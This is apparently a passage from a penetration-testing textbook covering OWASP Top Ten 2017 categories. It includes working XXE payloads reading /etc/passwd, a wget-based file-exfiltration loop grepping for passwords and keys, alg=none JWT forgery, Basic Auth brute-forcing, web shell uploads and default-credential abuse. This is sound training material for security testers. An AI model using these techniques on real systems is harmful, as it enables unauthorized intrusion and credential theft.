[...] although there are other ways to secure a network and effectively thwart a spoofing and poisoning attack. In this chapter we discussed how Sensitive Data Exposure can manifest itself, and how we as attackers can use several tools to help exploit poorly configured websites. Inadequate caching control, leaked credentials, and missing security headers are all scenarios web application penetration testers will come across in time. Interestingly, the entire last example, ARP poisoning and DNS spoofing, would have been much less likely to dupe a victim into divulging credentials if only the HSTS header were set for bigexamplebank.com. In fact, just because we spoofed the DNS record for a banking website doesn't mean we can bypass the HSTS preload built into the browser. The mere existence of this header would have resulted in a browser warning regarding the untrustworthy SSL certificate. Note that as of 2019, Gmail still does not have the HSTS header set. Cryptography works in most cases when configured properly: bcrypt and scrypt hashes take significantly more time to crack compared to MD5, whereas enforcing TLS connections forces attackers to try harder to compromise connections. The exposure of sensitive data comes in many forms; as attackers it benefits us to be familiar with various web application vulnerabilities and useful tools to help with exploitation.
Chapter 5
OWASP A4:2017 XML External Entities (XXE)
Details: As with other OWASP top ten vulnerabilities, XXE is an attack that takes into account several elements, such as a webserver hosting a vulnerable application, a poorly configured XML processor, an attacker, and the ability to submit input which will be processed by the vulnerable XML processor. Let's discuss these components and the intricacies of XXE in more detail. XML (Extensible Markup Language) is a markup language (like HTML) commonly used on the web to facilitate the storage and transportation of data. XML is self-descriptive and comprised of user-defined tags, as opposed to HTML, which has a limited number of predefined tags developers can utilize. Figure 5.1 shows an example of XML. Note the arbitrary names of the tags and the equally arbitrary values defined within each tag; the first line in this example is called the prolog.
Note this internal entity has been defined in the local DTD (hence standalone being set to yes in the prolog) and is merely serving as a placeholder for the author's name. This is useful when there is a need to repeatedly reference the author without wanting to hardcode it. Also note the syntax of the entity as shown in the author element: the beginning ampersand "&" followed by the entity name and finally the semicolon.
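A minimal document along these lines (the element and entity names are illustrative):

<?xml version="1.0" standalone="yes"?>
<!DOCTYPE book [
  <!ENTITY authorname "Serge Borso">
]>
<book>
  <author>&authorname;</author>
</book>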
Below is an example of an external entity reference. The example in Figure 5.3 introduces a few more components of XML useful to discuss, and which will help us eventually craft an attack we can understand and appreciate.
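An external entity declaration of the kind described might look like the following sketch, with evilsite.info standing in for the remote location:

<?xml version="1.0" standalone="no"?>
<!DOCTYPE book [
  <!ELEMENT author (#PCDATA)>
  <!ENTITY authorname SYSTEM "http://evilsite.info/entity.txt">
]>
<book>
  <author>&authorname;</author>
</book>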
In this example the SYSTEM keyword denotes the entity is private (the concept being this entity would be reserved for perhaps a single author of the document), contrasted with the PUBLIC keyword. The reference to the evilsite.info URI denotes the location where the entity can be found (and would subsequently be incorporated into the document), and since this is no longer local, standalone is set to "no" in the prolog. For thoroughness, PCDATA refers to Parsed Character Data, which will be parsed by the parser, as opposed to CDATA (Character Data), which will not be parsed; tags inside CDATA will not be treated as markup and entities inside of CDATA will not be expanded. With this knowledge, a possible attack would be to replace the reference to the URI with that of a file from the vulnerable application's local filesystem. This would in turn tell the parser to replace the reference to the entity with the file and subsequently display its output as shown in Figure 5.4.
[...] to its configuration. For instance, remote code execution is typically rare, and depends on the type of XML processor being used and how it has been written. More often, the information disclosure of listing directory contents and reading files is the extent of the flaw. We can typically use this flaw to gain a foothold when we are able to read files which contain sensitive information. Examples of this would be SSH key files, files containing passwords, and even web server source code files which, when resulting in source code disclosure, can also lead us down a path of remote compromise. As this flaw will result in the ability to list directory contents and read files, it behooves us as penetration testers to have a comfortable/deep understanding of filesystem structures and locations of interesting files. XXE, as with other application layer vulnerabilities, impacts the application oftentimes regardless of the underlying operating system; thus in the case of XXE the OS may be running Windows, Linux, or BSD. Knowing the structure of the filesystem associated with the OS will help us craft more potent and fruitful attacks.
Processing XML is not an overly complex task and can in fact be accomplished with only a few lines of code when leveraging suitable libraries to assist in the process. For instance, the XMLHttpRequest object has an XML parser built in and can be leveraged in our browser to handle this. Conversely, in many situations processing and parsing XML documents can be a cumbersome task best suited for dedicated programs purpose-built for the job. It is this latter fact which lends itself to error-prone consequences, meaning that oftentimes a commercially available (or open-source) processor is vulnerable, and the business/application relying on this software is at risk of compromise. Commonly a business is accustomed to purchasing software to provide a solution (like HR and payroll benefits) and is not responsible for updating or maintaining the code. Likewise, the consumer of a commercial product is generally ill-equipped to perform any type of security testing/scanning of the commercial software they purchase. Due to this, it is not uncommon for attackers to be the first to discover an XXE flaw in externally available systems supporting end user XML input.
[...] attack string to exploit the flaw. So, at this point the identification of the flaw was confirmed and I even had the code required to exploit it. My next step was to take the attack code (which was basically just an HTTP POST request) and utilize Burp to first confirm that I could reproduce the finding (Nessus did show the results of the /etc/passwd file, so I had a high level of confidence the finding was legitimate) using my own tools, since reproducing the flaw ensures there is not a false positive, and of equal importance, this enables me to tweak the POST request to meet my needs. Burp's Repeater tool is a great choice to use when there is a need to modify HTTP requests, submit them, review the results of the request, and continue to modify until the request is perfect. Using Repeater, I was not only able to reproduce the original request and confirm the flaw but also specify other files and folders to view. The successful exploit can be seen in Figure 5.5.
At this point I was able to view local directory listings on the OS hosting the vulnerable application (local from the perspective of the OS, but remote from my perspective) and was able to read files which I had permission to read. I had access to navigate the entire filesystem and wrote a custom script to aid in automatically parsing file contents. This was implemented in bash and leveraged wget to make the POST request followed by parsing the contents of the results file. The challenging part of the script was writing the logic to determine whether the results were the contents of a file or a directory listing, as it was not always evident from the results of the POST request without manual review. After running the script, I reviewed the resulting files which had been downloaded and grepped through them for keywords such as password and key. Within several user directories were improperly configured SSH keys which I was able to read. From there, gaining SSH access to the vulnerable systems was trivial. The XXE vulnerability resulted in the compromise of several hosts and served as the initial vulnerability that led to the eventual compromise of the entire environment.
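A stripped-down sketch of that kind of loop; the endpoint, payload template, and path list are hypothetical stand-ins rather than the engagement's actual values:

#!/bin/bash
# Request each candidate path through the XXE-vulnerable POST endpoint.
TARGET="http://target.example/xml-endpoint"   # hypothetical endpoint
while read -r path; do
  payload="<?xml version=\"1.0\"?><!DOCTYPE t [<!ENTITY xxe SYSTEM \"file://$path\">]><t>&xxe;</t>"
  wget -q --post-data "$payload" -O "loot$(echo "$path" | tr '/' '_')" "$TARGET"
done < paths.txt
# Then grep the loot for likely secrets.
grep -il -e password -e key loot_*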
[...] identification phase we can leverage the fuzzing feature of ZAP, and will execute our attack on the profile/quote input on the vulnerable HR management system depicted in Figure 5.6.
The form's text box allows us to submit input to the application, which will in turn be handled by an XML processor. The resulting text, if valid, will be used to update our "user quote". After enabling ZAP and configuring our browser to leverage the proxy, we first prime ZAP with the applicable POST request. The next step is to fuzz the input with each of the attack strings mentioned a moment ago and then launch the attack in order to try and invoke an error. In reality, if we are only submitting a dozen or so strings then [...]
Focusing on the response size (the size, in bytes, of the HTTP response from the server) we can see there is an evident difference for several of the submitted inputs per Figure 5.8.
ZAP is doing what we told it to do: launching the fuzzing attack. This tool, however, is not going to have the context in this instance to understand the attack we launched or the impact/relevance of the strings submitted and the subsequent results from the application. The point is, it is incumbent upon us as the attacker to understand what we are doing and wield our tools accordingly. Even using the built-in scanning feature of ZAP failed to identify the XXE vulnerability on this page, as seen in Figure 5.9.
Figure 5.9 ZAP alerts showing some findings but not XXE.
Specifically, as it pertains to the output of Figure 5.10, we can see on the far right of the bottom portion of ZAP's output the parameters submitted using the fuzzer, starting with < and followed by >, ., <!, and so on from top to bottom. The highlighted input shows a response size of 3,664 bytes, which is not only different from all of the other response sizes but also the largest.
Examples: Continuing with the HTML form example, let's work to invoke additional error messages. ZAP's Open/Resend with Request Editor tool (as well as Burp's Repeater, which is essentially the same thing) will work great for this. Since we know the POST payload and request to focus on, we can begin by modifying the payload to include an attack string specific to the application and input. Submitting the string:
userquote=<!DOCTYPE test [ <!ELEMENT test ANY ><!ENTITY xxe
SYSTEM "file:///etc/passwd" >]><quote>&xxe;</quote>
yields multiple errors, including those below, also shown in Figure 5.11:
Fatal Error 68: StartTag: invalid element name Line: 4 Column: 2
Fatal Error 68: StartTag: invalid element name Line: 4 Column: 19
Fatal Error 68: StartTag: invalid element name Line: 4 Column: 39
Fatal Error 76: Opening and ending tag mismatch: quote line 4 and q Line:
5 Column: 6
Fatal Error 76: Opening and ending tag mismatch: q line 3 and uq Line: 6
Column: 6
Fatal Error 77: Premature end of data in tag uq line 2 Line: 6 Column: 6
In viewing this error output, we are presented with clues on how to modify our input to resolve the errors and hopefully end up with valid XML syntax that includes our payload (in this example, the /etc/passwd reference). Let's modify the attack input to try and resolve the errors. Based on the first error, it looks like the standard XML prolog may be expected in this example, so adding in <?xml version='1.0'?> might help our efforts. There also seems to be an incorrectly typed quote, as both single and double quotes are being
used. The tag mismatch errors may be corrected with the modifications already made. Resubmitting the request with ZAP now yields the expected /etc/passwd output, as seen in the respective request and response in Figures 5.12 and 5.13.
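Putting those corrections together, the resubmitted attack string would resemble the following (a hedged reconstruction, since the application's exact wrapping tags are only visible in the figures):

    userquote=<?xml version='1.0'?><!DOCTYPE test [ <!ELEMENT test ANY >
    <!ENTITY xxe SYSTEM "file:///etc/passwd" >]><quote>&xxe;</quote>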
Chapter 6
OWASP A5:2017 Broken Access Control
The login process looks simple enough; the problem is that the authorization (as well as authentication, in this case) occurred as soon as the username was submitted. Specifically, by inputting a valid username I was able to gain access to that user's account while completely bypassing the rest of the login process. I have come across issues like this on various web applications, the root cause of which stems from a broken access control system; a failure to
validate the request properly before granting access. To elaborate on how this was possible, keep in mind that this was a white-box test, so I had access to several valid accounts. I proceeded to start the login process using one of the test accounts and took note of what page I was redirected to (home.aspx) once I successfully authenticated to the application. With this information I logged out, submitted a different username on the first login page, and then simply force browsed to home.aspx, which ended up showing me as logged in and authorized to access all of the account features for this user. The hard part was categorizing this vulnerability, as it's clearly an example of broken authentication just as it's indicative of broken access control. We'll explore this and techniques for exploitation in more detail next.
Examples: Search engines do a good job of scanning the web, finding publicly available websites and data, and making this information available for us to easily search. When a website is misconfigured and subsequently leaking sensitive information, divulging error messages (useful for SQL injection, for example) or other information we can use to attack it, Google, Bing, Shodan, and other search engines often encounter this, save it, and make this information available to search as well. This situation is not limited to websites and error messages; it extends to any internet-connected device and any useful information, including version numbers. Think about it from this perspective: if we can use a search engine to quickly find which websites are running version x.x of software z (like OpenSSL version 1.0.1f) and there is a known exploit for this version of the software, then we can leverage the search results to compile a list of hosts to attack. In some situations the search results themselves will leak the sensitive information attackers are seeking, and these are the concepts behind Google Dorks. As Google is the best at what it does in the search realm, it is the de facto tool used to identify some classes of vulnerabilities, including those leading to broken access control. Successfully using Google to obtain this type of information relies on us knowing the various search operators and how to wield them correctly. The basic syntax to obtain search results showing only results from our target website is: site:example.com where example.com is replaced with the actual target web application (note there is no space between the colon and the target). This is useful for reconnaissance as it will output all of the different hosts (like www.example.com, ftp.example.com, login.example.com, api.example.com, dev.example.com, etc.) Google is aware of and allowed to show for the target domain, which we can further filter with the - sign to exclude certain, perhaps already known, hosts. See Figure 6.5 and Figure 6.6 for examples.
Let's add to this by introducing more operators to further narrow down exactly what we are looking for, such as directory browsing and interesting documents. Documents like PDFs, DOCXs, images, and the like can have embedded metadata which we can parse through to gain access to potential usernames, details on the version and software used to create the documents, and other interesting information we can use to our advantage. This is accomplished by simply adding the ext operator with an accompanying extension, like site:example.com -www.example.com ext:pdf. This will show results from all hosts on the example.com domain except for the www.example.com website and should only display PDF documents. We can subsequently click on each link and download each PDF (or automate this process) and then use exiftool to search for interesting metadata, as shown in Figure 6.7.
Figure 6.7 Metadata output as seen from command line using exiftool.
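Automating the download-and-parse step is straightforward; in a minimal Python sketch (the document URLs below are hypothetical placeholders for whatever the search returns), it might look like this:

    import subprocess
    import urllib.request

    # Hypothetical URLs harvested from the site:/ext:pdf search results
    pdf_urls = ["https://example.com/files/report1.pdf",
                "https://example.com/files/report2.pdf"]

    for i, url in enumerate(pdf_urls):
        local = "doc%d.pdf" % i
        urllib.request.urlretrieve(url, local)      # download the document
        meta = subprocess.run(["exiftool", local],  # exiftool must be installed
                              capture_output=True, text=True).stdout
        for line in meta.splitlines():
            # Fields that commonly leak usernames and authoring software versions
            if any(k in line for k in ("Author", "Creator", "Producer")):
                print(local, "->", line)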
A page may not show up in search results even though it exists (in this hypothetical example). However, we can simply open our browser and manually browse to that page, and this is the concept behind forced browsing, only with a bit more intelligence by using preconstructed lists of popular/common page names and directory listing results which may not otherwise be indexed by search engines. ZAP has a built-in feature called Forced Browse which does just this; it used to be a standalone tool called DirBuster but has since been incorporated into the core functionality of ZAP (Figure 6.8).
By selecting the target application we want to force browse, we can start the tool and view the results, which will show us available directories (or files, as the case may be); basically, responses from the website which do not contain a 404 response code. To be most effective we do, however, in most cases want to tune the tool to use a custom list, or at least modify the default word list to include files and folders we are already aware of from our reconnaissance, directory browsing results, and previous engagements. Figure 6.9 shows the results of a Forced Browse attack.
The results of the forced browsing attack will often yield directories and pages which should not be exposed externally or which are missing the appropriate access controls. As with the results from other tools, it is incumbent upon us to manually verify the results and use them to further our goals of gaining access to the target system.
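The core logic of a forced browse is simple enough to sketch in a few lines of Python; the target and wordlist below are hypothetical:

    import requests

    target = "https://target.example.com"                    # hypothetical target
    wordlist = ["admin", "backup", "dev", "old", "uploads"]  # tune from recon

    for word in wordlist:
        resp = requests.get("%s/%s/" % (target, word), allow_redirects=False)
        if resp.status_code != 404:   # the same basic test the tool performs
            print(resp.status_code, word)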
Poorly configured web applications may expose elements responsible for access control to the client in GET parameters, hidden form fields, cookies, and other areas typically used to handle session state. In the case of parameters, these can be aptly named admin, role, userlevel, or similar, with an associated numerical value denoting the type of access/privilege. In cases when such a parameter exists, we want to attempt to modify the value to see if by changing the value we can modify our level of access. Figure 6.10 shows an example of various parameters and values.
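For instance, if we observe a request such as GET /account.aspx?role=user&userlevel=2 (hypothetical parameter names and values), resubmitting it as GET /account.aspx?role=admin&userlevel=1 may be all that is required to elevate our access.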
Often we have little information to guide our efforts, but with the proper tools and mindset we can succeed in identifying and exploiting elements associated with broken access control, and other flaws for that matter.
Another common example of broken access control centers around the JSON Web Token (JWT), a stateless mechanism described in RFC 7519 and used for authentication. A JWT can be thought of as a digitally signed container carrying identification information such as a username, level of permission, associated claims, expiration time, and so on. The JWT is comprised of three parts: a header, a payload, and a signature, collectively constructed as a variable-length Base64-encoded string of characters separated by two periods. This is shown in Figure 6.11. The string of characters preceding the first period (the header) denotes the algorithm used to sign (or in some cases encrypt) the payload and the token type, such as HS256 (HMAC with SHA256) and JWT, respectively. The next string of characters, between the two periods, is the payload. The final string of characters is the signature, which is calculated using a secret key over the values of the header and payload (once again, in some cases, as JWTs don't have to be encrypted and can instead be digitally signed). Like many things in cyber security, when implemented correctly a JWT does a good job for its intended purpose; it's when the implementation is flawed that we find ways to exploit it.
As it pertains to the security of JWTs, two of the main things we want to test are the strength of the secret key used for signing and weaknesses in libraries blindly accepting none as the hashing algorithm. The example application shown in Figure 6.12 uses JWT for authentication, as we can see from the HTTP response header sent to our browser after the initial successful login request, depicted in Figure 6.13.
With this information we can see the user authenticated as a guest with what seems to be a privilege level of five. At times there is sensitive information in a JWT that is important for us to identify, as it may be useful for further attacks. This token is signed, which means that while we can easily see what the header and payload contain, and even change these contents, if we do so and resubmit the token, the server or API should reject our request based on a signature mismatch stemming from our tampering. However, we can attempt to simply change the algorithm from HS256 to none, remove the signature, change guest to administrator, and resubmit the token. This could be accomplished with ZAP's encode/decode feature; see Figures 6.15 through 6.18 for details.
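A minimal Python sketch of forging such a token follows; the claim names mirror the example application and are otherwise hypothetical:

    import base64
    import json

    def b64url(data: bytes) -> str:
        # JWTs use URL-safe base64 with the padding stripped
        return base64.urlsafe_b64encode(data).rstrip(b"=").decode()

    header = {"alg": "none", "typ": "JWT"}               # algorithm downgraded to none
    payload = {"user": "administrator", "privlevel": 5}  # guest changed to administrator

    token = ".".join([b64url(json.dumps(header).encode()),
                      b64url(json.dumps(payload).encode()),
                      ""])                               # signature removed entirely
    print(token)  # resubmit in place of the original token and observe the response

If the library blindly honors an algorithm of none, the tampered token is accepted despite the missing signature.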
Chapter 7
OWASP A6:2017 Security Misconfiguration
Consider load-balanced web servers and database servers replicating to multiple datacenters; this was the status quo for over a decade, and it's how we arrived at a point where we could
not only patch vulnerabilities, update certificates, and manage/inspect traffic flow, but also upgrade our codebase in real time without impact. This idea of automating the maintenance and succession of dozens of moving parts, all of which are driven by software and version control, gave way to a devops approach of continuous integration, continuous delivery, and constant change to the environment. While adoption of true devops is still not extremely prevalent in most larger companies, the underlying concepts of devops have taken hold in many organizations, and as a result weekly sprints, regular change advisory board (CAB) meetings, and adoption of cloud services/platforms are very common. This newer method of automating implementation, delivery, testing, and so on sets heightened expectations on the quality of security, and can also result in a complex system requiring constant attention to ensure stability, fluidity, and adherence to business requirements. As a result of the constant state of flux, establishing baseline hardening principles and continuing to implement them becomes difficult if the process is not constantly updated or elegantly automated.
Because of this and other competing priorities, it is often found that default settings are left unchanged, debugging is enabled on production systems, unnecessary services are found to be running, and secure build documents are not maintained on paper or followed in practice. Change management ticket requests to allow firewall rules for a new server build in the DMZ are approved because the business needs outweigh the security concerns and "scanning after the go-live will find all the issues". Security professionals often see the missteps of typical business operations, the corners cut, and the aftermath of doing so over an extended period of time, as the results are evident the first time we conduct a penetration test. If you are not privy to these realities, know that they happen every day, due to an example scenario like the one just mentioned, or due to incompetence/ignorance, or just poor business practices. Malice is almost never a factor; humans want to do the right thing most of the time, and in a for-profit business environment, keeping systems online and ensuring continued revenue is the right thing to do.
Real-World Dialog: I teach several classes for the SANS Institute, and in some of the discussions with students the topic of server hardening comes up. We look at Netcraft results and the adoption of security headers and SSL/TLS configurations on varying websites, and invariably the value of the Server header (as seen in Figure 7.1) is brought up.
Why divulge the real value for this header? Why tell everyone we are running Apache with various modules compiled in and their associated versions? Is there any value in doing so, and is there any increase in security if we hide or alter these values? These questions will almost always result in a spirited conversation about security through obscurity (just because we hide the value doesn't mean any vulnerabilities associated with our version of software disappear...), software popularity metrics (how else can we measure how prevalent Apache is compared to others...), with me steering the conversation to whether we believe the value is accurate (or how we might verify its accuracy). In practice, the most I have seen done to the Server header value is hiding it or completely removing it, and I see this about 3% of the time. The other 97% of the time the header is divulged, accurately portraying the underlying software being used to serve the website. Why? Because 3% of the time a WAF hides this header by default, and the other 97% of the time absolutely no one with the ability and level of access required to make this change has ever had so little work to do that the task of "changing the default Server header" has risen to the top of their priority list. Of course, I have not confirmed this, but something tells me I am right.... Another thing that doesn't always get changed is default passwords for commercial software.
During the internal portion of a network penetration test, a colleague came across an IBM WebSphere server and, in doing his due diligence (researching and identifying potential default administrative passwords), was able to log in with administrative rights simply using the vendor-documented default login credentials. This was a production system hosting a multitude of websites while running atop a Windows Server 2016 enterprise system. With administrative rights we were able to deploy arbitrary WAR files, among other things, resulting in a running instance of our custom code. With this functionality I wrote a simple JSP page with an input box allowing for command execution/injection. Whatever command we submitted to the form was executed on the Windows server with SYSTEM privilege. An encoded MSF PowerShell
payload spawning an Empire agent ensued, as did our initial foothold into
the network.
A common fallacy I held before I gained experience at various companies was that larger organizations were more secure than smaller ones. My thought process was based on the notion that a large company has lots of money, and therefore has more security staff and the latest or best technology across the enterprise. If the company didn't have the best technology and the smartest people maintaining the infrastructure, then surely they would not remain on the cutting edge for long, and their role as a profitable leader in their industry would diminish over time. That was my logic, and needless to say it was significantly flawed. What I learned is embodied in the bulk of this "Real-World Dialog" section of this chapter. Complexity breeds insecurity, and the more technology, the more stuff a company has, the harder it is to keep track of everything. With that, let's turn our attention to how to exploit security misconfigurations.
With this information, the next step is to search for known default credentials and known vulnerabilities; useful resources to aid in this step are CIRT (cirt.net/passwords) and the CVE list (cve.mitre.org), respectively. A quick search through CIRT for Splunk passwords shows only one set of credentials, as seen in Figure 7.4.
A search on the CVE list shows our version of Splunk as being vulnerable to CVE-2018-11409 and contains a link to the Exploit Database, where author "KoF2002" has contributed a PoC (proof of concept) attack string, as we can see in Figure 7.5. At this point we logically want to try to log in with the default credentials and attempt to exploit the information disclosure vulnerability.
Websites don't just run on port 80 and port 443, and though the target of our testing may be the primary web interface, we need to be cognizant of additional services listening on the target host. The most efficient way to identify additional running services is by using nmap. This tool can quickly determine which ports are open and can probe to determine which service is running. Beyond basic port scanning, however, nmap comes with a series of built-in scripts as part of the NSE (nmap scripting engine) which we can use to identify vulnerabilities in some cases and further expose information about the target system. Basic invocation of the tool will help identify listening services by scanning, as a default setting, the most popular/common 1,000 ports on a target system. Figure 7.6 shows the results of such a scan.
The ports identified as open have the associated service description displayed as part of the output, but to ensure nmap is actually probing to determine the true listening service and its version, we want to specify the -sV option as part of our command. Doing so may change a previously unknown result to a description of the actual service running on the given port, as well as the identified version. It's also prudent to enable OS detection as a matter of course in most situations, and to run some basic NSE scripts as well as a trace route for thoroughness. Nmap provides the "-A" option to do all of this in one command; that is, what would normally be a command consisting of "nmap -sV -O --traceroute --script=default" can now be executed as "nmap -A" with the intended target(s) indicated as part of the command. The results are visible in Figure 7.7.
Many more NSE scripts are included than those run with a typical nmap scan. From a UNIX-based system, the command "ls /usr/share/nmap/scripts/*http* | wc -l" yields a result of over 130 HTTP scripts (a snippet of which is shown in Figure 7.8), ranging from a Joomla brute-force utility to a form fuzzer, and over one dozen CVE vulnerability checks (akin to a vulnerability scanner).
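For example, a single script can be invoked by name, as in "nmap --script=http-enum -p 80,443 10.90.14.27", which enumerates common web application directories on the target.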
Beyond a proxy switcher (to toggle between ZAP and Burp and none, for example), some useful extensions might include a utility to identify the IP address of the current domain we are browsing, tamper data, a user-agent switcher, web developer tools, and the like. In addition, we can glean a significant amount of information about a target web application and the technology it uses by using the Wappalyzer extension, which is shown in Figure 7.9.
Figure 7.9 Wappalyzer output as seen when viewing from within browser.
Similar to mobile app permissions, we have the ability to see what information an extension will require to operate prior to installing it, and we want to be careful because the extension is executing in our browser. As we submit sensitive content, the extension has the ability to access this information. Unless we are vetting each extension manually or writing our own, we have to rely on the community and our level of trust in the developer/team responsible for writing the extension. Of course, the same could be said of our browser, and our OS for that matter. It can be interesting to see how fickle any conglomerate of software actually is the deeper we understand its inner workings and trust relationships. With our current understanding of potential security misconfigurations, let's shift our focus to exploitation.
With the output of this stack trace we can hone in on the software version information and parlay this knowledge into a search for CVEs. This is usually the quickest way to exploitation, and while there are many tens of thousands of vulnerabilities identified every year, finding a matching vulnerability specific to our target software with an accompanying and working exploit is rare. What we come across more often is a reference to a CVE for a version of software with little to no detailed information about the flaw and no exploit code. As we saw in the Splunk example earlier, some exploits are rather basic and consist of nothing more than a specially crafted GET
request. However, many other public exploits require very specific conditions to work and can be time-consuming to debug when they fail. With that being said, exploit development is certainly a skill which will serve us well, as we can't always rely on a known exploit being available and reliable. Turning our attention back to cstat, identified in the stack trace, we can try to do some research about the technology, but a quick web search returns only similar results (nothing exactly referencing this software). Turning to nmap, a command of "nmap -p 1-65535 -A -oA cstatServer 10.90.14.27" will scan all ports with the benefits of the "-A" option previously mentioned while outputting results to three different formats (XML, greppable, and the default) with a base output filename of "cstatServer". This is useful as greppable output is easy to search, whereas the default nmap output is much more detailed. Finally, the XML output is very verbose and actually contains significantly more information than even the default nmap output. An example of default nmap output is shown in Figure 7.11.
The results of the nmap scan show a high port listening with an identified service called cstat and a corresponding version of "0.22". Browsing to this port (as shown in Figure 7.12) shows the administrative interface for what appears to be the CMS (content management system) for the web application running on the default ports of 80 and 443 on the same server.
Submitting the username identified in the stack trace results in a 401 HTTP response and prompts for a Basic Authentication dialog box in our browser. Another security misconfiguration: Basic Authentication has no concept of account lockout.... The exposed username is valid and was configured with a weak password, which we were able to guess with just under 10,000 requests. A bash one-liner helped to concatenate the "jsmith" username with a list of common passwords, as we can see in Figure 7.14, whereas Figure 7.15 shows the utilization of the encoded payload.
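The one-liner itself appears in the figure; an equivalent sketch in Python, assuming a hypothetical passwords.txt wordlist, would be:

    import base64

    with open("passwords.txt") as f:  # list of common passwords
        for pw in f:
            cred = "jsmith:%s" % pw.strip()
            # Each line becomes a candidate Basic Authorization value for the fuzzer
            print(base64.b64encode(cred.encode()).decode())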
ZAP's fuzzer was easily set up to use this list of preconfigured base64-encoded credentials, and looking at the results we can see that one request resulted in a 200 response code (our indicator of success, visible in Figure 7.16). Figure 7.17 shows the result of gaining administrative access upon successful exploitation.
With administrative access to the CMS we have the ability to create new pages, moderate content, change permissions, impersonate (as well as create and delete) users, and so on. A straightforward method of gaining shell access in this case is to upload a shell (via the convenient content management feature of the CMS) and then access it from our browser. A collection of ASP web shells exists online, and the minimal code shown in Figure 7.18 will provide an HTML form where we can submit commands (Figure 7.19) to the back-end OS. The results of a successful attack are shown in Figure 7.20.
https://nameofbucket.storage.googleapis.com/nameofobjectinbucket
https://storage.googleapis.com/nameofbucket/nameofobjectinbucket
https://s3.amazonaws.com/nameofbucket/nameofobjectinbucket
https://nameofbucket.s3.amazonaws.com/nameofobjectinbucket
https://nameofbucket.blob.core.windows.net/nameofobjectinbucket
In addition, there may be a full path required to specify the location of the object in the bucket. The content in the storage container is very much meant to be accessible by someone or some process, hence the familiar URL format; to access a bucket, all we need to know is the name of the bucket. To identify the bucket name we want to hone in on, we can turn back to our search engine of choice and conduct a search with the site: directive to narrow down the results. For example, a query of "site:blob.core.windows.net 'nameoftarget'" should help, and of course additional operators to search for specific document types and keywords will further filter the results to exactly what we are looking for, as is evident in Figure 7.21.
Finding evidence of cloud storage containers, and having confidence that the identified container and the contents in the container are public (we can set granular permissions on not just the folder/directory/bucket but also the files/resources within the bucket), takes a bit more effort. While manual efforts are convenient for quickly checking for the existence of the storage containers in a one-off situation, we want to automate this process as our target list grows. While we could create our own solution to handle the process of identifying cloud storage containers for the three major cloud service providers, the tools to do this already exist. Years ago, a fellow security professional released a Ruby script, "bucket_finder.rb", to automate this process for S3 buckets; it requires a wordlist (applicable names of buckets to search for) and supports the ability to download the publicly available files along with logging. This is shown in Figure 7.22.
Similar tools exist for the other providers' storage containers, additional examples of which we'll explore later. There are many ways to incorrectly configure a web server, cloud service, or codebase, and as penetration testers we need to be well versed in knowing what to look for, knowing how to identify a given flaw, and knowing how we can use the vulnerability to gain further access to the system. This chapter clarified that the target scope of the penetration test can vary significantly based on the expectations, business, and rules of engagement. Typically, the root cause of security misconfigurations stems from human oversight or poor planning/implementation. Staying up to date with the latest technology is challenging, and it's not uncommon for distinct teams in an organization to move quickly in adopting a new solution to a current problem. The difficulty in securing a given solution stems from limitations in our knowledge, the infancy of the chosen technology, the lack of documentation, employee turnover, and the accumulation of technical debt. All of these things, with the addition of time, make it very hard to secure an environment and subsequently provide opportunities for us to succeed in our endeavors.
Chapter 8
OWASP A7:2017 Cross-Site Scripting (XSS)
It is rare that the client/business will allow us to target users of their production application.
The root cause of an XSS vulnerability resides at the web application layer, typically in the code-base; unsanitized user input is not adequately encoded prior to being sent to a user or being executed in the DOM. This means we can submit a malicious payload (almost always JavaScript; other scripting languages will also work) to the application, and in turn this payload is parsed/stored or otherwise accepted by the application and subsequently returned to the victim. If this happens immediately (as an HTTP response to our HTTP request), this would be an example of reflected XSS. If the payload is executed later, when we navigate to a specific portion of the application, this would be stored XSS. In the event the XSS attack never gets sent to the server (by utilizing the # character in the URL, for example) or otherwise is delivered and resides strictly in the DOM, this would be an example of DOM-based XSS.
A stored XSS vulnerability allows us to use the persistent storage of the application (typically the back-end database) to host our malicious payload while the web server conveniently serves our attack to users of the application. This type of flaw can be devastating, as everyone visiting the compromised web application will be served our malicious JavaScript from the origin of the vulnerable host. To be clear, we can submit malicious scripts which will subsequently be sent from the server to the client and execute in the client's browser. The same-origin policy (SOP) is not being bypassed, as the source of the script (from the perspective of the browser) is the vulnerable host. This means our malicious script will run in the victim's browser and be able to access the DOM and other resources just as a legitimate/benign script could. The potency of this type of attack is significant, as JavaScript is a powerful programming language, and thus, when we launch a successful attack, we have a lot of control over what occurs in the context of the client's experience, session, and interactions with the vulnerable web application and their browser. We have to think about browser plugins, browser password storage, social engineering attacks, and more, as JavaScript executing in a browser has access to the entirety of the technology exposed by the API; yet another reason why attacking clients is not typically in scope.
Reflected XSS is not persistent and is typically delivered via a link to the victim, which will in turn be submitted to the vulnerable application as a GET request. This means the attack is a one-time event (or as many times as the link is clicked). In this situation we would find a vulnerable GET parameter, craft an attack, share the entire URI, complete with the malicious JavaScript, with the victim, and hope the bait is taken. The ensuing attack would only execute when the victim clicks the link and submits the GET request, and the malicious script is sent back to the victim's browser with the HTTP response. However, we would have to target individual victims and have them directly interact with our attack string, so this is not always a viable path to exploitation. A DOM-based XSS vulnerability can be stored or reflected.
Sometimes it can be hard to clearly explain XSS to a typical business leader; in addition, it can be challenging to convey the risk of XSS. To aid in these efforts, we need to find a path to exploitation which adequately portrays the risk of the finding. To do this we have to conduct research into the extent of the vulnerability and test the payload on ourselves first, to tweak it to perfection. As with previously discussed vulnerabilities, there are limitations to XSS attacks in terms of the impact they will have and our ability to successfully launch the attack. Recall there are three components to XSS (the application, our attack/payload, and the victim), each of which has the potential to reduce our effectiveness; for instance, if our payload is poorly tested, or the attack vector is minimal, or the client simply has script execution disabled in her browser. Even with these limitations we can still oftentimes launch a serious attack with real consequences for the victim. And let's be clear: the user is the victim of the attack, not the application (at least not directly). It is the victim who has the browser which executes our code; the application is merely the initial conduit for our payload.
XSS is the second most common finding in the OWASP top ten list, but it's not the second most impactful due to the limitations already touched on. A common attack scenario for XSS is to hijack a user's session by obtaining the session token and sending it to the attacker. Another common attack with XSS is to alter the contents of the page, modify form actions, enable keystroke logging, or otherwise attempt to gain access to sensitive information. Yet another very important XSS attack is to obtain XSRF tokens to bypass security controls. As with any other vulnerability identified during a penetration test, the risk rating associated with XSS must always be taken in context: how sensitive is the application, and what is the level of impact associated with our successful exploitation?
Being such a common vulnerability, there are a multitude of tools designed specifically to identify XSS. However, the complexity of JavaScript (especially minified and purposefully obfuscated, as seen in Figure 8.1) makes the task of reading it, let alone comprehending it, challenging for some vulnerability scanning tools and can lead to false negatives.
